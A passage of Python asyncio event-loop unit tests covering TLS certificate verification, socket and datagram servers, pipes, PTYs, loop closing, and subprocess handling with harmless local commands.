lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=local_addr, family=family)
s_transport, server = self.loop.run_until_complete(coro)
sockname = s_transport.get_extra_info('sockname')
host, port = socket.getnameinfo(
sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint(self):
self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
@unittest.skipUnderUwsgi()
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
@unittest.skipUnderUwsgi()
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
